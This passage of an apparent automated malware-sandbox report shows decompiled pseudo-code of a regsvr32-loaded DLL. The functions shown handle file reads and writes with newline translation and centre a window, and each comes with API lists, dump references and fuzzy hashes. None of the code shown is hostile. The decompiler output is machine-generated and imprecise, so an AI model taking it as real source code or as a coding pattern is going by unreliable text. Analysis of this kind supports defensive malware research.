                                                                        • HeapFree.KERNEL32(00000000), ref: 1000502F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@Heap$FreeProcess
                                                                        • String ID:
                                                                        • API String ID: 834397476-0
                                                                        • Opcode ID: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                        • Instruction ID: 9f87828e50faab3a5d058e3d57900a61c1aef8edd5c1bc6d424dad7412e7468d
                                                                        • Opcode Fuzzy Hash: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                        • Instruction Fuzzy Hash: 94719631200B158FE318DF6CCEC5A57B7A9FB89341B05C52ED926CB7A5E670E905CB48
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001B36C Relevance: 6.2, APIs: 4, Instructions: 167fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1001B36C(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t79;
				void* _t82;
				signed int _t86;
				signed int* _t89;
				long _t90;
				void* _t92;
				intOrPtr _t93;
				signed int _t97;
				intOrPtr _t98;
				char _t100;
				signed int _t101;
				long _t103;
				long _t106;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				signed char _t117;
				intOrPtr _t118;
				long _t120;
				void* _t124;
				intOrPtr* _t125;
				signed int _t127;
				signed char* _t128;
				void* _t129;
				void* _t130;

				_v12 = _v12 & 0x00000000;
				_t113 = _a8;
				_t124 = _t113;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t79 = _a4;
				_t125 = 0x1004f920 + (_t79 >> 5) * 4;
				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
				_t82 =  *_t125 + _t127;
				_t117 =  *((intOrPtr*)(_t82 + 4));
				if((_t117 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
					_a12 = _a12 - 1;
					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
					_t124 = _t113 + 1;
					_v12 = 1;
					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
				}
				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
					_t86 = _v16;
					_t118 =  *_t125;
					_v12 = _v12 + _t86;
					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						L15:
						_t89 =  *_t125 + _t127 + 4;
						 *_t89 =  *_t89 & 0x000000fb;
						__eflags =  *_t89;
						L16:
						_t90 = _a8;
						_t120 = _v12 + _t90;
						__eflags = _t90 - _t120;
						_a12 = _t90;
						_v12 = _t120;
						if(_t90 >= _t120) {
							L40:
							_t114 = _t113 - _a8;
							__eflags = _t114;
							_v12 = _t114;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t92 =  *_a12;
							__eflags = _t92 - 0x1a;
							if(_t92 == 0x1a) {
								break;
							}
							__eflags = _t92 - 0xd;
							if(_t92 == 0xd) {
								__eflags = _a12 - _t120 - 1;
								if(_a12 >= _t120 - 1) {
									_a12 = _a12 + 1;
									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
									__eflags = _t97;
									if(_t97 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t113 = 0xd;
											L35:
											_t113 = _t113 + 1;
											__eflags = _t113;
											L36:
											_t120 = _v12;
											__eflags = _a12 - _t120;
											if(_a12 < _t120) {
												continue;
											}
											goto L40;
										}
										_t98 =  *_t125;
										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
											__eflags = _t113 - _a8;
											if(__eflags != 0) {
												L33:
												E1001968C(__eflags, _a4, 0xffffffff, 1);
												_t130 = _t130 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t113 = 0xa;
											goto L35;
										}
										_t100 = _v5;
										__eflags = _t100 - 0xa;
										if(_t100 == 0xa) {
											goto L32;
										}
										 *_t113 = 0xd;
										 *((char*)( *_t125 + _t127 + 5)) = _t100;
										goto L35;
									}
									_t101 = GetLastError();
									__eflags = _t101;
									if(_t101 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t103 = _a12 + 1;
								__eflags =  *_t103 - 0xa;
								if( *_t103 != 0xa) {
									_a12 = _t103;
									goto L34;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t113 = _t92;
							_t113 = _t113 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t93 =  *_t125;
						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
							_t128 = _t93 + _t127 + 4;
							 *_t128 =  *_t128 | 0x00000002;
							__eflags =  *_t128;
						}
						goto L40;
					}
					__eflags =  *_t113 - 0xa;
					if( *_t113 != 0xa) {
						goto L15;
					}
					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
					goto L16;
				} else {
					_t106 = GetLastError();
					_t129 = 5;
					if(_t106 != _t129) {
						__eflags = _t106 - 0x6d;
						if(_t106 == 0x6d) {
							goto L42;
						}
						_t107 = E10013707(_t106);
						L10:
						return _t107 | 0xffffffff;
					}
					 *((intOrPtr*)(E100136F5())) = 9;
					_t107 = E100136FE();
					 *_t107 = _t129;
					goto L10;
				}
			}































                                                                        0x1001b372
                                                                        0x1001b37b
                                                                        0x1001b380
                                                                        0x1001b382
                                                                        0x1001b540
                                                                        0x1001b540
                                                                        0x00000000
                                                                        0x1001b540
                                                                        0x1001b388
                                                                        0x1001b396
                                                                        0x1001b39f
                                                                        0x1001b3a2
                                                                        0x1001b3a4
                                                                        0x1001b3aa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b3b3
                                                                        0x1001b3c1
                                                                        0x1001b3c4
                                                                        0x1001b3c8
                                                                        0x1001b3cb
                                                                        0x1001b3d2
                                                                        0x1001b3d2
                                                                        0x1001b3ee
                                                                        0x1001b429
                                                                        0x1001b42c
                                                                        0x1001b42e
                                                                        0x1001b431
                                                                        0x1001b436
                                                                        0x1001b53b
                                                                        0x00000000
                                                                        0x1001b53b
                                                                        0x1001b43c
                                                                        0x1001b43e
                                                                        0x1001b450
                                                                        0x1001b452
                                                                        0x1001b456
                                                                        0x1001b456
                                                                        0x1001b459
                                                                        0x1001b459
                                                                        0x1001b45f
                                                                        0x1001b461
                                                                        0x1001b463
                                                                        0x1001b466
                                                                        0x1001b469
                                                                        0x1001b535
                                                                        0x1001b535
                                                                        0x1001b535
                                                                        0x1001b538
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b46f
                                                                        0x1001b46f
                                                                        0x1001b472
                                                                        0x1001b474
                                                                        0x1001b476
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b47c
                                                                        0x1001b47e
                                                                        0x1001b48c
                                                                        0x1001b48f
                                                                        0x1001b4a5
                                                                        0x1001b4b9
                                                                        0x1001b4bf
                                                                        0x1001b4c1
                                                                        0x1001b4cd
                                                                        0x1001b4cd
                                                                        0x1001b4d1
                                                                        0x1001b513
                                                                        0x1001b513
                                                                        0x1001b516
                                                                        0x1001b516
                                                                        0x1001b516
                                                                        0x1001b517
                                                                        0x1001b517
                                                                        0x1001b51a
                                                                        0x1001b51d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b523
                                                                        0x1001b4d3
                                                                        0x1001b4d5
                                                                        0x1001b4da
                                                                        0x1001b4ee
                                                                        0x1001b4f1
                                                                        0x1001b4fe
                                                                        0x1001b505
                                                                        0x1001b50a
                                                                        0x1001b50d
                                                                        0x1001b511
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b511
                                                                        0x1001b4f3
                                                                        0x1001b4f7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b4f9
                                                                        0x1001b4f9
                                                                        0x00000000
                                                                        0x1001b4f9
                                                                        0x1001b4dc
                                                                        0x1001b4df
                                                                        0x1001b4e1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b4e3
                                                                        0x1001b4e8
                                                                        0x00000000
                                                                        0x1001b4e8
                                                                        0x1001b4c3
                                                                        0x1001b4c9
                                                                        0x1001b4cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b4cb
                                                                        0x1001b494
                                                                        0x1001b495
                                                                        0x1001b498
                                                                        0x1001b4a0
                                                                        0x00000000
                                                                        0x1001b4a0
                                                                        0x1001b49a
                                                                        0x00000000
                                                                        0x1001b49a
                                                                        0x1001b480
                                                                        0x1001b482
                                                                        0x1001b483
                                                                        0x00000000
                                                                        0x1001b483
                                                                        0x1001b525
                                                                        0x1001b527
                                                                        0x1001b52c
                                                                        0x1001b52e
                                                                        0x1001b532
                                                                        0x1001b532
                                                                        0x1001b532
                                                                        0x00000000
                                                                        0x1001b52c
                                                                        0x1001b440
                                                                        0x1001b443
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b44b
                                                                        0x00000000
                                                                        0x1001b3f0
                                                                        0x1001b3f0
                                                                        0x1001b3f8
                                                                        0x1001b3fb
                                                                        0x1001b411
                                                                        0x1001b414
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b41b
                                                                        0x1001b421
                                                                        0x00000000
                                                                        0x1001b421
                                                                        0x1001b402
                                                                        0x1001b408
                                                                        0x1001b40d
                                                                        0x00000000
                                                                        0x1001b40d

                                                                        APIs
                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 1001B3E6
                                                                        • GetLastError.KERNEL32(?,?,?), ref: 1001B3F0
                                                                        • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 1001B4B9
                                                                        • GetLastError.KERNEL32(?,?,?), ref: 1001B4C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFileLastRead
                                                                        • String ID:
                                                                        • API String ID: 1948546556-0
                                                                        • Opcode ID: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                        • Instruction ID: 3bbfbaef22ec515d269d62fd47d355a82d48074a4c8ee7a64ff4f0343116150f
                                                                        • Opcode Fuzzy Hash: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                        • Instruction Fuzzy Hash: DB61D374A04B89DFDB21CFA8C880B997BF0EF05354F158099E9618F2A2D770DAC1CB11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000E58F Relevance: 6.2, APIs: 4, Instructions: 165windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 63%
                                                                        			E1000E58F(void* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t84;
				void* _t107;
				void* _t126;
				intOrPtr _t130;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t135;
				intOrPtr _t136;
				void* _t137;

				_t126 = __edx;
				_t135 = __ecx;
				_t130 = E10023092( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
				_v12 = _t130;
				_t58 = IsWindowVisible( *(_t130 + 0x1c));
				asm("sbb eax, eax");
				_t60 =  ~_t58 + 1;
				_v24 = _t60;
				_t107 = 0;
				if(_t60 != 0) {
					GetWindowRect( *(E100220EE(_t137, GetDesktopWindow()) + 0x1c),  &_v56);
					GetWindowRect( *(_t130 + 0x1c),  &_v40);
					asm("cdq");
					asm("cdq");
					E1002036F(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
					E100203AD(_t130, 1);
				}
				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
				_t131 = _t135 + 0x48;
				_push(_t131);
				_push(0x100405f8);
				_push(_t62);
				if( *((intOrPtr*)( *_t62))() < 0) {
					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x10040550,  &_v16);
					if(_t66 >= _t107) {
						_t67 = _v16;
						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
						_t69 = _v16;
						 *((intOrPtr*)( *_t69 + 8))(_t69);
						_t71 = _v20;
						if(_t71 != _t107) {
							_t133 = _t135 + 8;
							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x10042ff8, _t133);
							_t73 = _v20;
							 *((intOrPtr*)( *_t73 + 8))(_t73);
							_t66 = _v8;
							if(_t66 >= _t107) {
								_t134 =  *_t133;
								 *((intOrPtr*)( *_t134))(_t134, 0x10042fe8, _t135 + 0xc);
								goto L14;
							}
						} else {
							_t66 = 0x80004005;
						}
					}
				} else {
					_t84 =  *_t131;
					_t134 = _t135 + 0x4c;
					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x10043298, _t134);
					if( *_t134 == _t107) {
						_v8 = 0x80004003;
					}
					if(_v8 >= _t107) {
						L14:
						_t136 = E1000E14F(_t107, _t135, _t134, _t135);
						if(_v24 != _t107) {
							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E100203AD(_v12, _t107);
						}
						_t66 = _t136;
					} else {
						if(_v24 != _t107) {
							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E100203AD(_v12, _t107);
						}
						_t66 = _v8;
					}
				}
				return _t66;
			}

































                                                                        0x1000e58f
                                                                        0x1000e597
                                                                        0x1000e5a5
                                                                        0x1000e5aa
                                                                        0x1000e5ad
                                                                        0x1000e5b5
                                                                        0x1000e5b7
                                                                        0x1000e5ba
                                                                        0x1000e5bd
                                                                        0x1000e5be
                                                                        0x1000e5d3
                                                                        0x1000e5e0
                                                                        0x1000e5ed
                                                                        0x1000e5fd
                                                                        0x1000e603
                                                                        0x1000e60c
                                                                        0x1000e60c
                                                                        0x1000e614
                                                                        0x1000e619
                                                                        0x1000e61c
                                                                        0x1000e61d
                                                                        0x1000e622
                                                                        0x1000e627
                                                                        0x1000e688
                                                                        0x1000e697
                                                                        0x1000e69b
                                                                        0x1000e6a1
                                                                        0x1000e6ab
                                                                        0x1000e6ae
                                                                        0x1000e6b4
                                                                        0x1000e6b7
                                                                        0x1000e6bc
                                                                        0x1000e6c7
                                                                        0x1000e6d3
                                                                        0x1000e6d6
                                                                        0x1000e6dc
                                                                        0x1000e6df
                                                                        0x1000e6e4
                                                                        0x1000e6e6
                                                                        0x1000e6f4
                                                                        0x00000000
                                                                        0x1000e6f4
                                                                        0x1000e6be
                                                                        0x1000e6be
                                                                        0x1000e6be
                                                                        0x1000e6bc
                                                                        0x1000e629
                                                                        0x1000e629
                                                                        0x1000e62d
                                                                        0x1000e63d
                                                                        0x1000e640
                                                                        0x1000e642
                                                                        0x1000e642
                                                                        0x1000e64c
                                                                        0x1000e6f6
                                                                        0x1000e700
                                                                        0x1000e702
                                                                        0x1000e71c
                                                                        0x1000e725
                                                                        0x1000e725
                                                                        0x1000e72a
                                                                        0x1000e652
                                                                        0x1000e655
                                                                        0x1000e66f
                                                                        0x1000e678
                                                                        0x1000e678
                                                                        0x1000e67d
                                                                        0x1000e67d
                                                                        0x1000e64c
                                                                        0x1000e730

                                                                        APIs
                                                                        • IsWindowVisible.USER32 ref: 1000E5AD
                                                                        • GetDesktopWindow.USER32 ref: 1000E5C0
                                                                        • GetWindowRect.USER32 ref: 1000E5D3
                                                                        • GetWindowRect.USER32 ref: 1000E5E0
                                                                          • Part of subcall function 1002036F: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,1000E721,?,?), ref: 1002038A
                                                                          • Part of subcall function 100203AD: ShowWindow.USER32(?,?,1000E72A,00000000,?,?), ref: 100203BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$DesktopMoveShowVisible
                                                                        • String ID:
                                                                        • API String ID: 3835705305-0
                                                                        • Opcode ID: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                        • Instruction ID: 525efb47f72b729c7b32d6b473f79529eff02a82a59350a91d8b9bca58045246
                                                                        • Opcode Fuzzy Hash: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                        • Instruction Fuzzy Hash: F351D875A0020AAFDB00DFA8DD84CAEB7BAFF48345B154459F646E7255CB31BE41CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100197AB Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100197AB(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t68;
				void** _t73;
				signed int _t74;
				long _t76;
				intOrPtr _t79;
				signed int _t81;
				char* _t86;
				int _t91;
				long _t93;
				intOrPtr* _t100;
				void* _t102;
				signed int _t107;
				char _t110;
				struct _OVERLAPPED* _t112;
				long _t115;
				signed int _t118;
				struct _OVERLAPPED* _t120;
				void* _t121;
				void* _t123;

				_t121 = _t123 - 0x3a0;
				_t68 =  *0x1004c470; // 0x303bb91f
				_t112 = 0;
				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
				 *(_t121 - 0x78) = 0;
				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
				if( *(_t121 + 0x3b0) != 0) {
					_t100 = 0x1004f920 + ( *(_t121 + 0x3a8) >> 5) * 4;
					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
					if(__eflags != 0) {
						E1001B190(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
					}
					_t73 =  *_t100 + _t118;
					__eflags = _t73[1] & 0x00000080;
					if((_t73[1] & 0x00000080) == 0) {
						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
						__eflags = _t74;
						if(_t74 == 0) {
							 *(_t121 - 0x6c) = GetLastError();
						} else {
							 *(_t121 - 0x6c) = _t112;
							 *(_t121 - 0x78) =  *(_t121 - 0x80);
						}
					} else {
						__eflags =  *(_t121 + 0x3b0) - _t112;
						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
						 *(_t121 - 0x6c) = _t112;
						if( *(_t121 + 0x3b0) <= _t112) {
							L25:
							_t79 =  *_t100;
							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
								L28:
								 *((intOrPtr*)(E100136F5())) = 0x1c;
								_t81 = E100136FE();
								 *_t81 = _t112;
								L29:
								_t77 = _t81 | 0xffffffff;
								L31:
								goto L32;
							}
							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
							if( *( *(_t121 + 0x3ac)) != 0x1a) {
								goto L28;
							}
							_t77 = 0;
							goto L31;
						} else {
							goto L6;
						}
						do {
							L6:
							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
							__eflags = _t107;
							_t86 = _t121 - 0x68;
							 *(_t121 - 0x70) = _t112;
							do {
								__eflags = _t107 -  *(_t121 + 0x3b0);
								if(_t107 >=  *(_t121 + 0x3b0)) {
									break;
								}
								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
								_t110 =  *( *(_t121 - 0x74));
								_t107 = _t107 + 1;
								__eflags = _t110 - 0xa;
								if(_t110 == 0xa) {
									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
									 *_t86 = 0xd;
									_t86 = _t86 + 1;
									_t34 = _t121 - 0x70;
									 *_t34 =  &( *(_t121 - 0x70)->Internal);
									__eflags =  *_t34;
								}
								 *_t86 = _t110;
								_t86 = _t86 + 1;
								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
								__eflags =  *(_t121 - 0x70) - 0x400;
							} while ( *(_t121 - 0x70) < 0x400);
							_t115 = _t86 - _t121 - 0x68;
							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
							__eflags = _t91;
							if(_t91 == 0) {
								 *(_t121 - 0x6c) = GetLastError();
								L16:
								_t112 = 0;
								__eflags = 0;
								L17:
								_t76 =  *(_t121 - 0x78);
								__eflags = _t76 - _t112;
								if(_t76 != _t112) {
									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									goto L31;
								}
								__eflags =  *(_t121 - 0x6c) - _t112;
								if( *(_t121 - 0x6c) == _t112) {
									goto L25;
								}
								_t120 = 5;
								__eflags =  *(_t121 - 0x6c) - _t120;
								if( *(_t121 - 0x6c) != _t120) {
									_t81 = E10013707( *(_t121 - 0x6c));
								} else {
									 *((intOrPtr*)(E100136F5())) = 9;
									_t81 = E100136FE();
									 *_t81 = _t120;
								}
								goto L29;
							}
							_t93 =  *(_t121 - 0x80);
							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
							__eflags = _t93 - _t115;
							if(_t93 < _t115) {
								goto L16;
							}
							_t112 = 0;
							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
					}
					goto L17;
				} else {
					_t77 = 0;
					L32:
					return E100117AE(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
				}
			}






















                                                                        0x100197ac
                                                                        0x100197b9
                                                                        0x100197bf
                                                                        0x100197c7
                                                                        0x100197cd
                                                                        0x100197d0
                                                                        0x100197d3
                                                                        0x100197f3
                                                                        0x100197fc
                                                                        0x100197ff
                                                                        0x10019804
                                                                        0x10019810
                                                                        0x10019815
                                                                        0x1001981a
                                                                        0x1001981c
                                                                        0x10019820
                                                                        0x10019906
                                                                        0x1001990c
                                                                        0x1001990e
                                                                        0x10019921
                                                                        0x10019910
                                                                        0x10019913
                                                                        0x10019916
                                                                        0x10019916
                                                                        0x10019826
                                                                        0x10019826
                                                                        0x10019832
                                                                        0x10019835
                                                                        0x10019838
                                                                        0x10019931
                                                                        0x10019931
                                                                        0x10019933
                                                                        0x10019938
                                                                        0x10019949
                                                                        0x1001994e
                                                                        0x10019954
                                                                        0x10019959
                                                                        0x1001995b
                                                                        0x1001995b
                                                                        0x10019963
                                                                        0x00000000
                                                                        0x10019964
                                                                        0x10019940
                                                                        0x10019943
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019945
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001983e
                                                                        0x1001983e
                                                                        0x10019841
                                                                        0x10019841
                                                                        0x10019847
                                                                        0x1001984a
                                                                        0x1001984d
                                                                        0x1001984d
                                                                        0x10019853
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019858
                                                                        0x1001985b
                                                                        0x1001985d
                                                                        0x1001985e
                                                                        0x10019861
                                                                        0x10019863
                                                                        0x10019866
                                                                        0x10019869
                                                                        0x1001986a
                                                                        0x1001986a
                                                                        0x1001986a
                                                                        0x1001986a
                                                                        0x1001986d
                                                                        0x1001986f
                                                                        0x10019870
                                                                        0x10019873
                                                                        0x10019873
                                                                        0x10019881
                                                                        0x10019893
                                                                        0x10019899
                                                                        0x1001989b
                                                                        0x100198c2
                                                                        0x100198c5
                                                                        0x100198c5
                                                                        0x100198c5
                                                                        0x100198c7
                                                                        0x100198c7
                                                                        0x100198ca
                                                                        0x100198cc
                                                                        0x10019960
                                                                        0x10019960
                                                                        0x00000000
                                                                        0x10019960
                                                                        0x100198d2
                                                                        0x100198d5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100198d9
                                                                        0x100198da
                                                                        0x100198dd
                                                                        0x10019929
                                                                        0x100198df
                                                                        0x100198e4
                                                                        0x100198ea
                                                                        0x100198ef
                                                                        0x100198ef
                                                                        0x00000000
                                                                        0x100198dd
                                                                        0x1001989d
                                                                        0x100198a0
                                                                        0x100198a3
                                                                        0x100198a5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100198b0
                                                                        0x100198b2
                                                                        0x100198b2
                                                                        0x100198ba
                                                                        0x00000000
                                                                        0x100197d5
                                                                        0x100197d5
                                                                        0x10019965
                                                                        0x10019978
                                                                        0x10019978

                                                                        APIs
                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,1004C878,00000001), ref: 10019893
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                        • Instruction ID: bcb25415e8510b231303bc6364b9eff1bf1e0548ad7273a78b3d91e774eab1a2
                                                                        • Opcode Fuzzy Hash: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                        • Instruction Fuzzy Hash: AD513671900298DFDB22CFA9C880ADDBBF8FF46744F21411AE9599F256DB309A81CF11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1003078E Relevance: 6.1, APIs: 4, Instructions: 134COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E1003078E(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
